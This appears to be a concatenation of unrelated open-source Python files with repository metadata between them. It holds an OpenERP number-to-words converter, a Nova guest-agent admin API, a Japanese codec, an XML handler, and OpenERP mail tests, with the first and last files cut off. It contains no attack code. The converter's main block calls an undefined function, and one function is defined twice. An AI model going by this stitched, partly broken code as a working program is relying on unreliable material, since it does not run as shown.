# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from translate import _
_logger = logging.getLogger(__name__)
#-------------------------------------------------------------
#ENGLISH
#-------------------------------------------------------------
to_19 = ( 'Zero', 'One', 'Two', 'Three', 'Four', 'Five', 'Six',
'Seven', 'Eight', 'Nine', 'Ten', 'Eleven', 'Twelve', 'Thirteen',
'Fourteen', 'Fifteen', 'Sixteen', 'Seventeen', 'Eighteen', 'Nineteen' )
tens = ( 'Twenty', 'Thirty', 'Forty', 'Fifty', 'Sixty', 'Seventy', 'Eighty', 'Ninety')
denom = ( '',
'Thousand', 'Million', 'Billion', 'Trillion', 'Quadrillion',
'Quintillion', 'Sextillion', 'Septillion', 'Octillion', 'Nonillion',
'Decillion', 'Undecillion', 'Duodecillion', 'Tredecillion', 'Quattuordecillion',
'Sexdecillion', 'Septendecillion', 'Octodecillion', 'Novemdecillion', 'Vigintillion' )
def _convert_nn(val):
"""convert a value < 100 to English.
"""
if val < 20:
return to_19[val]
for (dcap, dval) in ((k, 20 + (10 * v)) for (v, k) in enumerate(tens)):
if dval + 10 > val:
if val % 10:
return dcap + '-' + to_19[val % 10]
return dcap
def _convert_nnn(val):
"""
convert a value < 1000 to english, special cased because it is the level that kicks
off the < 100 special case. The rest are more general. This also allows you to
get strings in the form of 'forty-five hundred' if called directly.
"""
word = ''
(mod, rem) = (val % 100, val // 100)
if rem > 0:
word = to_19[rem] + ' Hundred'
if mod > 0:
word += ' '
if mod > 0:
word += _convert_nn(mod)
return word
def english_number(val):
if val < 100:
return _convert_nn(val)
if val < 1000:
return _convert_nnn(val)
for (didx, dval) in ((v - 1, 1000 ** v) for v in range(len(denom))):
if dval > val:
mod = 1000 ** didx
l = val // mod
r = val - (l * mod)
ret = _convert_nnn(l) + ' ' + denom[didx]
if r > 0:
ret = ret + ', ' + english_number(r)
return ret
def amount_to_text(number, currency):
number = '%.2f' % number
units_name = currency
list = str(number).split('.')
start_word = english_number(int(list[0]))
end_word = english_number(int(list[1]))
cents_number = int(list[1])
cents_name = (cents_number > 1) and 'Cents' or 'Cent'
return ' '.join(filter(None, [start_word, units_name, (start_word or units_name) and (end_word or cents_name) and 'and', end_word, cents_name]))
#-------------------------------------------------------------
# Generic functions
#-------------------------------------------------------------
_translate_funcs = {'en' : amount_to_text}
#TODO: we should use the country AND language (ex: septante VS soixante dix)
#TODO: we should use en by default, but the translation func is yet to be implemented
def amount_to_text(nbr, lang='en', currency='euro'):
""" Converts an integer to its textual representation, using the language set in the context if any.
Example::
1654: thousands six cent cinquante-quatre.
"""
import openerp.loglevels as loglevels
# if nbr > 10000000:
# _logger.warning(_("Number too large '%d', can not translate it"))
# return str(nbr)
if not _translate_funcs.has_key(lang):
_logger.warning(_("no translation function found for lang: '%s'"), lang)
#TODO: (default should be en) same as above
lang = 'en'
return _translate_funcs[lang](abs(nbr), currency)
if __name__=='__main__':
from sys import argv
lang = 'nl'
if len(argv) < 2:
for i in range(1,200):
print i, ">>", int_to_text(i, lang)
for i in range(200,999999,139):
print i, ">>", int_to_text(i, lang)
else:
print int_to_text(int(argv[1]), lang)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
mmnelemane/nova
|
nova/api/openstack/compute/legacy_v2/contrib/agents.py
|
7
|
7919
|
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob.exc
from nova.api.openstack import extensions
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova import objects
from nova import utils
authorize = extensions.extension_authorizer('compute', 'agents')
class AgentController(object):
"""The agent is talking about guest agent.The host can use this for
things like accessing files on the disk, configuring networking,
or running other applications/scripts in the guest while it is
running. Typically this uses some hypervisor-specific transport
to avoid being dependent on a working network configuration.
Xen, VMware, and VirtualBox have guest agents,although the Xen
driver is the only one with an implementation for managing them
in openstack. KVM doesn't really have a concept of a guest agent
(although one could be written).
You can find the design of agent update in this link:
http://wiki.openstack.org/AgentUpdate
and find the code in nova.virt.xenapi.vmops.VMOps._boot_new_instance.
In this design We need update agent in guest from host, so we need
some interfaces to update the agent info in host.
You can find more information about the design of the GuestAgent in
the following link:
http://wiki.openstack.org/GuestAgent
http://wiki.openstack.org/GuestAgentXenStoreCommunication
"""
def index(self, req):
"""Return a list of all agent builds. Filter by hypervisor."""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks.
nova_context.require_admin_context(context)
hypervisor = None
agents = []
if 'hypervisor' in req.GET:
hypervisor = req.GET['hypervisor']
builds = objects.AgentList.get_all(context, hypervisor=hypervisor)
for agent_build in builds:
agents.append({'hypervisor': agent_build.hypervisor,
'os': agent_build.os,
'architecture': agent_build.architecture,
'version': agent_build.version,
'md5hash': agent_build.md5hash,
'agent_id': agent_build.id,
'url': agent_build.url})
return {'agents': agents}
def update(self, req, id, body):
"""Update an existing agent build."""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks.
nova_context.require_admin_context(context)
try:
para = body['para']
url = para['url']
md5hash = para['md5hash']
version = para['version']
except (TypeError, KeyError) as ex:
msg = _("Invalid request body: %s") % ex
raise webob.exc.HTTPBadRequest(explanation=msg)
try:
utils.validate_integer(id, 'id')
utils.check_string_length(url, 'url', max_length=255)
utils.check_string_length(md5hash, 'md5hash', max_length=255)
utils.check_string_length(version, 'version', max_length=255)
except exception.InvalidInput as exc:
raise webob.exc.HTTPBadRequest(explanation=exc.format_message())
try:
agent = objects.Agent(context=context, id=id)
agent.obj_reset_changes()
agent.version = version
agent.url = url
agent.md5hash = md5hash
agent.save()
except exception.AgentBuildNotFound as ex:
raise webob.exc.HTTPNotFound(explanation=ex.format_message())
# NOTE(alex_xu): The agent_id should be integer that consistent with
# create/index actions. But parameter 'id' is string type that parsed
# from url. This is a bug, but because back-compatibility, it can't be
# fixed for v2 API. This will be fixed after v3 API feature exposed by
# micro-version in the future. lp bug #1333494
return {"agent": {'agent_id': id, 'version': version,
'url': url, 'md5hash': md5hash}}
def delete(self, req, id):
"""Deletes an existing agent build."""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks.
nova_context.require_admin_context(context)
try:
utils.validate_integer(id, 'id')
except exception.InvalidInput as exc:
raise webob.exc.HTTPBadRequest(explanation=exc.format_message())
try:
agent = objects.Agent(context=context, id=id)
agent.destroy()
except exception.AgentBuildNotFound as ex:
raise webob.exc.HTTPNotFound(explanation=ex.format_message())
def create(self, req, body):
"""Creates a new agent build."""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks.
nova_context.require_admin_context(context)
try:
agent = body['agent']
hypervisor = agent['hypervisor']
os = agent['os']
architecture = agent['architecture']
version = agent['version']
url = agent['url']
md5hash = agent['md5hash']
except (TypeError, KeyError) as ex:
msg = _("Invalid request body: %s") % ex
raise webob.exc.HTTPBadRequest(explanation=msg)
try:
utils.check_string_length(hypervisor, 'hypervisor', max_length=255)
utils.check_string_length(os, 'os', max_length=255)
utils.check_string_length(architecture, 'architecture',
max_length=255)
utils.check_string_length(version, 'version', max_length=255)
utils.check_string_length(url, 'url', max_length=255)
utils.check_string_length(md5hash, 'md5hash', max_length=255)
except exception.InvalidInput as exc:
raise webob.exc.HTTPBadRequest(explanation=exc.format_message())
try:
agent_obj = objects.Agent(context=context)
agent_obj.hypervisor = hypervisor
agent_obj.os = os
agent_obj.architecture = architecture
agent_obj.version = version
agent_obj.url = url
agent_obj.md5hash = md5hash
agent_obj.create()
agent['agent_id'] = agent_obj.id
except exception.AgentBuildExists as ex:
raise webob.exc.HTTPConflict(explanation=ex.format_message())
return {'agent': agent}
class Agents(extensions.ExtensionDescriptor):
"""Agents support."""
name = "Agents"
alias = "os-agents"
namespace = "http://docs.openstack.org/compute/ext/agents/api/v2"
updated = "2012-10-28T00:00:00Z"
def get_resources(self):
resources = []
resource = extensions.ResourceExtension('os-agents',
AgentController())
resources.append(resource)
return resources
|
apache-2.0
|
SerCeMan/intellij-community
|
python/lib/Lib/encodings/euc_jis_2004.py
|
816
|
1051
|
#
# euc_jis_2004.py: Python Unicode Codec for EUC_JIS_2004
#
# Written by Hye-Shik Chang <[email protected]>
#
import _codecs_jp, codecs
import _multibytecodec as mbc
codec = _codecs_jp.getcodec('euc_jis_2004')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='euc_jis_2004',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
|
apache-2.0
|
pyhmsa/pyhmsa
|
pyhmsa/fileformat/xmlhandler/condition/region.py
|
1
|
1491
|
"""
XML handler for region condition
"""
# Standard library modules.
# Third party modules.
# Local modules.
from pyhmsa.spec.condition.region import RegionOfInterest
from pyhmsa.fileformat.xmlhandler.condition.condition import _ConditionXMLHandler
# Globals and constants variables.
class RegionOfInterestXMLHandler(_ConditionXMLHandler):
def __init__(self, version):
super().__init__(RegionOfInterest, version)
def parse(self, element):
obj = super().parse(element)
subelement = element.find('StartChannel')
if subelement is None:
raise ValueError('Element StartChannel is missing')
start = self._parse_numerical_attribute(subelement)
subelement = element.find('EndChannel')
if subelement is None:
raise ValueError('Element EndChannel is missing')
end = self._parse_numerical_attribute(subelement)
obj.channels = (start, end)
return obj
def convert(self, obj):
element = super().convert(obj)
value = obj.start_channel
attrib = type('MockAttribute', (object,), {'xmlname': 'StartChannel'})
subelements = self._convert_numerical_attribute(value, attrib)
element.extend(subelements)
value = obj.end_channel
attrib = type('MockAttribute', (object,), {'xmlname': 'EndChannel'})
subelements = self._convert_numerical_attribute(value, attrib)
element.extend(subelements)
return element
|
mit
|
CXQERP/ODOOERP
|
addons/mail/tests/test_mail_features.py
|
76
|
59326
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2012-TODAY OpenERP S.A. <http://openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.addons.mail.mail_mail import mail_mail
from openerp.addons.mail.mail_thread import mail_thread
from openerp.addons.mail.tests.common import TestMail
from openerp.tools import mute_logger, email_split, html2plaintext
from openerp.tools.mail import html_sanitize
class test_mail(TestMail):
def test_000_alias_setup(self):
""" Test basic mail.alias setup works, before trying to use them for routing """
cr, uid = self.cr, self.uid
self.user_valentin_id = self.res_users.create(cr, uid,
{'name': 'Valentin Cognito', 'email': '[email protected]', 'login': 'valentin.cognito', 'alias_name': 'valentin.cognito'})
self.user_valentin = self.res_users.browse(cr, uid, self.user_valentin_id)
self.assertEquals(self.user_valentin.alias_name, self.user_valentin.login, "Login should be used as alias")
self.user_pagan_id = self.res_users.create(cr, uid,
{'name': 'Pagan Le Marchant', 'email': '[email protected]', 'login': '[email protected]', 'alias_name': '[email protected]'})
self.user_pagan = self.res_users.browse(cr, uid, self.user_pagan_id)
self.assertEquals(self.user_pagan.alias_name, 'plmarchant', "If login is an email, the alias should keep only the local part")
self.user_barty_id = self.res_users.create(cr, uid,
{'name': 'Bartholomew Ironside', 'email': '[email protected]', 'login': 'b4r+_#_R3wl$$', 'alias_name': 'b4r+_#_R3wl$$'})
self.user_barty = self.res_users.browse(cr, uid, self.user_barty_id)
self.assertEquals(self.user_barty.alias_name, 'b4r+_-_r3wl-', 'Disallowed chars should be replaced by hyphens')
def test_00_followers_function_field(self):
""" Tests designed for the many2many function field 'follower_ids'.
We will test to perform writes using the many2many commands 0, 3, 4,
5 and 6. """
cr, uid, user_admin, partner_bert_id, group_pigs = self.cr, self.uid, self.user_admin, self.partner_bert_id, self.group_pigs
# Data: create 'disturbing' values in mail.followers: same res_id, other res_model; same res_model, other res_id
group_dummy_id = self.mail_group.create(cr, uid,
{'name': 'Dummy group'}, {'mail_create_nolog': True})
self.mail_followers.create(cr, uid,
{'res_model': 'mail.thread', 'res_id': self.group_pigs_id, 'partner_id': partner_bert_id})
self.mail_followers.create(cr, uid,
{'res_model': 'mail.group', 'res_id': group_dummy_id, 'partner_id': partner_bert_id})
# Pigs just created: should be only Admin as follower
follower_ids = set([follower.id for follower in group_pigs.message_follower_ids])
self.assertEqual(follower_ids, set([user_admin.partner_id.id]), 'Admin should be the only Pigs fan')
# Subscribe Bert through a '4' command
group_pigs.write({'message_follower_ids': [(4, partner_bert_id)]})
group_pigs.refresh()
follower_ids = set([follower.id for follower in group_pigs.message_follower_ids])
self.assertEqual(follower_ids, set([partner_bert_id, user_admin.partner_id.id]), 'Bert and Admin should be the only Pigs fans')
# Unsubscribe Bert through a '3' command
group_pigs.write({'message_follower_ids': [(3, partner_bert_id)]})
group_pigs.refresh()
follower_ids = set([follower.id for follower in group_pigs.message_follower_ids])
self.assertEqual(follower_ids, set([user_admin.partner_id.id]), 'Admin should be the only Pigs fan')
# Set followers through a '6' command
group_pigs.write({'message_follower_ids': [(6, 0, [partner_bert_id])]})
group_pigs.refresh()
follower_ids = set([follower.id for follower in group_pigs.message_follower_ids])
self.assertEqual(follower_ids, set([partner_bert_id]), 'Bert should be the only Pigs fan')
# Add a follower created on the fly through a '0' command
group_pigs.write({'message_follower_ids': [(0, 0, {'name': 'Patrick Fiori'})]})
partner_patrick_id = self.res_partner.search(cr, uid, [('name', '=', 'Patrick Fiori')])[0]
group_pigs.refresh()
follower_ids = set([follower.id for follower in group_pigs.message_follower_ids])
self.assertEqual(follower_ids, set([partner_bert_id, partner_patrick_id]), 'Bert and Patrick should be the only Pigs fans')
# Finally, unlink through a '5' command
group_pigs.write({'message_follower_ids': [(5, 0)]})
group_pigs.refresh()
follower_ids = set([follower.id for follower in group_pigs.message_follower_ids])
self.assertFalse(follower_ids, 'Pigs group should not have fans anymore')
# Test dummy data has not been altered
fol_obj_ids = self.mail_followers.search(cr, uid, [('res_model', '=', 'mail.thread'), ('res_id', '=', self.group_pigs_id)])
follower_ids = set([follower.partner_id.id for follower in self.mail_followers.browse(cr, uid, fol_obj_ids)])
self.assertEqual(follower_ids, set([partner_bert_id]), 'Bert should be the follower of dummy mail.thread data')
fol_obj_ids = self.mail_followers.search(cr, uid, [('res_model', '=', 'mail.group'), ('res_id', '=', group_dummy_id)])
follower_ids = set([follower.partner_id.id for follower in self.mail_followers.browse(cr, uid, fol_obj_ids)])
self.assertEqual(follower_ids, set([partner_bert_id, user_admin.partner_id.id]), 'Bert and Admin should be the followers of dummy mail.group data')
def test_05_message_followers_and_subtypes(self):
""" Tests designed for the subscriber API as well as message subtypes """
cr, uid, user_admin, user_raoul, group_pigs = self.cr, self.uid, self.user_admin, self.user_raoul, self.group_pigs
# Data: message subtypes
self.mail_message_subtype.create(cr, uid, {'name': 'mt_mg_def', 'default': True, 'res_model': 'mail.group'})
self.mail_message_subtype.create(cr, uid, {'name': 'mt_other_def', 'default': True, 'res_model': 'crm.lead'})
self.mail_message_subtype.create(cr, uid, {'name': 'mt_all_def', 'default': True, 'res_model': False})
mt_mg_nodef = self.mail_message_subtype.create(cr, uid, {'name': 'mt_mg_nodef', 'default': False, 'res_model': 'mail.group'})
mt_all_nodef = self.mail_message_subtype.create(cr, uid, {'name': 'mt_all_nodef', 'default': False, 'res_model': False})
default_group_subtypes = self.mail_message_subtype.search(cr, uid, [('default', '=', True), '|', ('res_model', '=', 'mail.group'), ('res_model', '=', False)])
# ----------------------------------------
# CASE1: test subscriptions with subtypes
# ----------------------------------------
# Do: subscribe Raoul, should have default subtypes
group_pigs.message_subscribe_users([user_raoul.id])
group_pigs.refresh()
# Test: 2 followers (Admin and Raoul)
follower_ids = [follower.id for follower in group_pigs.message_follower_ids]
self.assertEqual(set(follower_ids), set([user_raoul.partner_id.id, user_admin.partner_id.id]),
'message_subscribe: Admin and Raoul should be the only 2 Pigs fans')
# Raoul follows default subtypes
fol_ids = self.mail_followers.search(cr, uid, [
('res_model', '=', 'mail.group'),
('res_id', '=', self.group_pigs_id),
('partner_id', '=', user_raoul.partner_id.id)
])
fol_obj = self.mail_followers.browse(cr, uid, fol_ids)[0]
fol_subtype_ids = set([subtype.id for subtype in fol_obj.subtype_ids])
self.assertEqual(set(fol_subtype_ids), set(default_group_subtypes),
'message_subscribe: Raoul subscription subtypes are incorrect, should be all default ones')
# Do: subscribe Raoul with specified new subtypes
group_pigs.message_subscribe_users([user_raoul.id], subtype_ids=[mt_mg_nodef])
# Test: 2 followers (Admin and Raoul)
follower_ids = [follower.id for follower in group_pigs.message_follower_ids]
self.assertEqual(set(follower_ids), set([user_raoul.partner_id.id, user_admin.partner_id.id]),
'message_subscribe: Admin and Raoul should be the only 2 Pigs fans')
# Test: 2 lines in mail.followers (no duplicate for Raoul)
fol_ids = self.mail_followers.search(cr, uid, [
('res_model', '=', 'mail.group'),
('res_id', '=', self.group_pigs_id),
])
self.assertEqual(len(fol_ids), 2,
'message_subscribe: subscribing an already-existing follower should not create new entries in mail.followers')
# Test: Raoul follows only specified subtypes
fol_ids = self.mail_followers.search(cr, uid, [
('res_model', '=', 'mail.group'),
('res_id', '=', self.group_pigs_id),
('partner_id', '=', user_raoul.partner_id.id)
])
fol_obj = self.mail_followers.browse(cr, uid, fol_ids)[0]
fol_subtype_ids = set([subtype.id for subtype in fol_obj.subtype_ids])
self.assertEqual(set(fol_subtype_ids), set([mt_mg_nodef]),
'message_subscribe: Raoul subscription subtypes are incorrect, should be only specified')
# Do: Subscribe Raoul without specified subtypes: should not erase existing subscription subtypes
group_pigs.message_subscribe_users([user_raoul.id, user_raoul.id])
group_pigs.message_subscribe_users([user_raoul.id])
group_pigs.refresh()
# Test: 2 followers (Admin and Raoul)
follower_ids = [follower.id for follower in group_pigs.message_follower_ids]
self.assertEqual(set(follower_ids), set([user_raoul.partner_id.id, user_admin.partner_id.id]),
'message_subscribe: Admin and Raoul should be the only 2 Pigs fans')
# Test: Raoul follows default subtypes
fol_ids = self.mail_followers.search(cr, uid, [
('res_model', '=', 'mail.group'),
('res_id', '=', self.group_pigs_id),
('partner_id', '=', user_raoul.partner_id.id)
])
fol_obj = self.mail_followers.browse(cr, uid, fol_ids)[0]
fol_subtype_ids = set([subtype.id for subtype in fol_obj.subtype_ids])
self.assertEqual(set(fol_subtype_ids), set([mt_mg_nodef]),
'message_subscribe: Raoul subscription subtypes are incorrect, should be only specified')
# Do: Unsubscribe Raoul twice through message_unsubscribe_users
group_pigs.message_unsubscribe_users([user_raoul.id, user_raoul.id])
group_pigs.refresh()
# Test: 1 follower (Admin)
follower_ids = [follower.id for follower in group_pigs.message_follower_ids]
self.assertEqual(follower_ids, [user_admin.partner_id.id], 'Admin must be the only Pigs fan')
# Test: 1 lines in mail.followers (no duplicate for Raoul)
fol_ids = self.mail_followers.search(cr, uid, [
('res_model', '=', 'mail.group'),
('res_id', '=', self.group_pigs_id)
])
self.assertEqual(len(fol_ids), 1,
'message_subscribe: group should have only 1 entry in mail.follower for 1 follower')
# Do: subscribe Admin with subtype_ids
group_pigs.message_subscribe_users([uid], [mt_mg_nodef, mt_all_nodef])
fol_ids = self.mail_followers.search(cr, uid, [('res_model', '=', 'mail.group'), ('res_id', '=', self.group_pigs_id), ('partner_id', '=', user_admin.partner_id.id)])
fol_obj = self.mail_followers.browse(cr, uid, fol_ids)[0]
fol_subtype_ids = set([subtype.id for subtype in fol_obj.subtype_ids])
self.assertEqual(set(fol_subtype_ids), set([mt_mg_nodef, mt_all_nodef]), 'subscription subtypes are incorrect')
# ----------------------------------------
# CASE2: test mail_thread fields
# ----------------------------------------
subtype_data = group_pigs._get_subscription_data(None, None)[group_pigs.id]['message_subtype_data']
self.assertEqual(set(subtype_data.keys()), set(['Discussions', 'mt_mg_def', 'mt_all_def', 'mt_mg_nodef', 'mt_all_nodef']), 'mail.group available subtypes incorrect')
self.assertFalse(subtype_data['Discussions']['followed'], 'Admin should not follow Discussions in pigs')
self.assertTrue(subtype_data['mt_mg_nodef']['followed'], 'Admin should follow mt_mg_nodef in pigs')
self.assertTrue(subtype_data['mt_all_nodef']['followed'], 'Admin should follow mt_all_nodef in pigs')
def test_11_notification_url(self):
""" Tests designed to test the URL added in notification emails. """
cr, uid, group_pigs = self.cr, self.uid, self.group_pigs
# Test URL formatting
base_url = self.registry('ir.config_parameter').get_param(cr, uid, 'web.base.url')
# Partner data
partner_raoul = self.res_partner.browse(cr, uid, self.partner_raoul_id)
partner_bert_id = self.res_partner.create(cr, uid, {'name': 'bert'})
partner_bert = self.res_partner.browse(cr, uid, partner_bert_id)
# Mail data
mail_mail_id = self.mail_mail.create(cr, uid, {'state': 'exception'})
mail = self.mail_mail.browse(cr, uid, mail_mail_id)
# Test: link for nobody -> None
url = mail_mail._get_partner_access_link(self.mail_mail, cr, uid, mail)
self.assertEqual(url, None,
'notification email: mails not send to a specific partner should not have any URL')
# Test: link for partner -> None
url = mail_mail._get_partner_access_link(self.mail_mail, cr, uid, mail, partner=partner_bert)
self.assertEqual(url, None,
'notification email: mails send to a not-user partner should not have any URL')
# Test: link for user -> signin
url = mail_mail._get_partner_access_link(self.mail_mail, cr, uid, mail, partner=partner_raoul)
self.assertIn(base_url, url,
'notification email: link should contain web.base.url')
self.assertIn('db=%s' % cr.dbname, url,
'notification email: link should contain database name')
self.assertIn('action=mail.action_mail_redirect', url,
'notification email: link should contain the redirect action')
self.assertIn('login=%s' % partner_raoul.user_ids[0].login, url,
'notification email: link should contain the user login')
# Test: link for user -> with model and res_id
mail_mail_id = self.mail_mail.create(cr, uid, {'model': 'mail.group', 'res_id': group_pigs.id})
mail = self.mail_mail.browse(cr, uid, mail_mail_id)
url = mail_mail._get_partner_access_link(self.mail_mail, cr, uid, mail, partner=partner_raoul)
self.assertIn(base_url, url,
'notification email: link should contain web.base.url')
self.assertIn('db=%s' % cr.dbname, url,
'notification email: link should contain database name')
self.assertIn('action=mail.action_mail_redirect', url,
'notification email: link should contain the redirect action')
self.assertIn('login=%s' % partner_raoul.user_ids[0].login, url,
'notification email: link should contain the user login')
self.assertIn('model=mail.group', url,
'notification email: link should contain the model when having not notification email on a record')
self.assertIn('res_id=%s' % group_pigs.id, url,
'notification email: link should contain the res_id when having not notification email on a record')
# Test: link for user -> with model and res_id
mail_mail_id = self.mail_mail.create(cr, uid, {'notification': True, 'model': 'mail.group', 'res_id': group_pigs.id})
mail = self.mail_mail.browse(cr, uid, mail_mail_id)
url = mail_mail._get_partner_access_link(self.mail_mail, cr, uid, mail, partner=partner_raoul)
self.assertIn(base_url, url,
'notification email: link should contain web.base.url')
self.assertIn('db=%s' % cr.dbname, url,
'notification email: link should contain database name')
self.assertIn('action=mail.action_mail_redirect', url,
'notification email: link should contain the redirect action')
self.assertIn('login=%s' % partner_raoul.user_ids[0].login, url,
'notification email: link should contain the user login')
self.assertIn('message_id=%s' % mail.mail_message_id.id, url,
'notification email: link based on message should contain the mail_message id')
self.assertNotIn('model=mail.group', url,
'notification email: link based on message should not contain model')
self.assertNotIn('res_id=%s' % group_pigs.id, url,
'notification email: link based on message should not contain res_id')
@mute_logger('openerp.addons.mail.mail_thread', 'openerp.models')
def test_12_inbox_redirection(self):
""" Tests designed to test the inbox redirection of emails notification URLs. """
cr, uid, user_admin, group_pigs = self.cr, self.uid, self.user_admin, self.group_pigs
model, act_id = self.ir_model_data.get_object_reference(cr, uid, 'mail', 'action_mail_inbox_feeds')
# Data: post a message on pigs
msg_id = self.group_pigs.message_post(body='My body', partner_ids=[self.partner_bert_id], type='comment', subtype='mail.mt_comment')
# No specific parameters -> should redirect to Inbox
action = mail_thread.message_redirect_action(self.mail_thread, cr, self.user_raoul_id, {'params': {}})
self.assertEqual(
action.get('type'), 'ir.actions.client',
'URL redirection: action without parameters should redirect to client action Inbox'
)
self.assertEqual(
action.get('id'), act_id,
'URL redirection: action without parameters should redirect to client action Inbox'
)
# Raoul has read access to Pigs -> should redirect to form view of Pigs
action = mail_thread.message_redirect_action(self.mail_thread, cr, self.user_raoul_id, {'params': {'message_id': msg_id}})
self.assertEqual(
action.get('type'), 'ir.actions.act_window',
'URL redirection: action with message_id for read-accredited user should redirect to Pigs'
)
self.assertEqual(
action.get('res_id'), group_pigs.id,
'URL redirection: action with message_id for read-accredited user should redirect to Pigs'
)
action = mail_thread.message_redirect_action(self.mail_thread, cr, self.user_raoul_id, {'params': {'model': 'mail.group', 'res_id': group_pigs.id}})
self.assertEqual(
action.get('type'), 'ir.actions.act_window',
'URL redirection: action with message_id for read-accredited user should redirect to Pigs'
)
self.assertEqual(
action.get('res_id'), group_pigs.id,
'URL redirection: action with message_id for read-accredited user should redirect to Pigs'
)
# Bert has no read access to Pigs -> should redirect to Inbox
action = mail_thread.message_redirect_action(self.mail_thread, cr, self.user_bert_id, {'params': {'message_id': msg_id}})
self.assertEqual(
action.get('type'), 'ir.actions.client',
'URL redirection: action without parameters should redirect to client action Inbox'
)
self.assertEqual(
action.get('id'), act_id,
'URL redirection: action without parameters should redirect to client action Inbox'
)
action = mail_thread.message_redirect_action(self.mail_thread, cr, self.user_bert_id, {'params': {'model': 'mail.group', 'res_id': group_pigs.id}})
self.assertEqual(
action.get('type'), 'ir.actions.client',
'URL redirection: action without parameters should redirect to client action Inbox'
)
self.assertEqual(
action.get('id'), act_id,
'URL redirection: action without parameters should redirect to client action Inbox'
)
def test_20_message_post(self):
""" Tests designed for message_post. """
cr, uid, user_raoul, group_pigs = self.cr, self.uid, self.user_raoul, self.group_pigs
# --------------------------------------------------
# Data creation
# --------------------------------------------------
# 0 - Update existing users-partners
self.res_users.write(cr, uid, [uid], {'email': 'a@a', 'notify_email': 'always'})
self.res_users.write(cr, uid, [self.user_raoul_id], {'email': 'r@r'})
# 1 - Bert Tartopoils, with email, should receive emails for comments and emails
p_b_id = self.res_partner.create(cr, uid, {'name': 'Bert Tartopoils', 'email': 'b@b'})
# 2 - Carine Poilvache, with email, should receive emails for emails
p_c_id = self.res_partner.create(cr, uid, {'name': 'Carine Poilvache', 'email': 'c@c', 'notify_email': 'none'})
# 3 - Dédé Grosbedon, without email, to test email verification; should receive emails for every message
p_d_id = self.res_partner.create(cr, uid, {'name': 'Dédé Grosbedon', 'email': 'd@d', 'notify_email': 'always'})
# 4 - Attachments
attach1_id = self.ir_attachment.create(cr, user_raoul.id, {
'name': 'Attach1', 'datas_fname': 'Attach1',
'datas': 'bWlncmF0aW9uIHRlc3Q=',
'res_model': 'mail.compose.message', 'res_id': 0})
attach2_id = self.ir_attachment.create(cr, user_raoul.id, {
'name': 'Attach2', 'datas_fname': 'Attach2',
'datas': 'bWlncmF0aW9uIHRlc3Q=',
'res_model': 'mail.compose.message', 'res_id': 0})
attach3_id = self.ir_attachment.create(cr, user_raoul.id, {
'name': 'Attach3', 'datas_fname': 'Attach3',
'datas': 'bWlncmF0aW9uIHRlc3Q=',
'res_model': 'mail.compose.message', 'res_id': 0})
# 5 - Mail data
_subject = 'Pigs'
_mail_subject = 'Re: %s' % (group_pigs.name)
_body1 = '<p>Pigs rules</p>'
_body2 = '<html>Pigs rocks</html>'
_attachments = [
('List1', 'My first attachment'),
('List2', 'My second attachment')
]
# --------------------------------------------------
# CASE1: post comment + partners + attachments
# --------------------------------------------------
# Data: set alias_domain to see emails with alias
self.registry('ir.config_parameter').set_param(self.cr, self.uid, 'mail.catchall.domain', 'schlouby.fr')
# Data: change Pigs name to test reply_to
self.mail_group.write(cr, uid, [self.group_pigs_id], {'name': '"Pigs" !ù $%-'})
# Do: subscribe Raoul
new_follower_ids = [self.partner_raoul_id]
group_pigs.message_subscribe(new_follower_ids)
# Test: group followers = Raoul + uid
group_fids = [follower.id for follower in group_pigs.message_follower_ids]
test_fids = new_follower_ids + [self.partner_admin_id]
self.assertEqual(set(test_fids), set(group_fids),
'message_subscribe: incorrect followers after subscribe')
# Do: Raoul message_post on Pigs
self._init_mock_build_email()
msg1_id = self.mail_group.message_post(cr, user_raoul.id, self.group_pigs_id,
body=_body1, subject=_subject, partner_ids=[p_b_id, p_c_id],
attachment_ids=[attach1_id, attach2_id], attachments=_attachments,
type='comment', subtype='mt_comment')
msg = self.mail_message.browse(cr, uid, msg1_id)
msg_message_id = msg.message_id
msg_pids = [partner.id for partner in msg.notified_partner_ids]
msg_aids = [attach.id for attach in msg.attachment_ids]
sent_emails = self._build_email_kwargs_list
# Test: mail_message: subject and body not modified
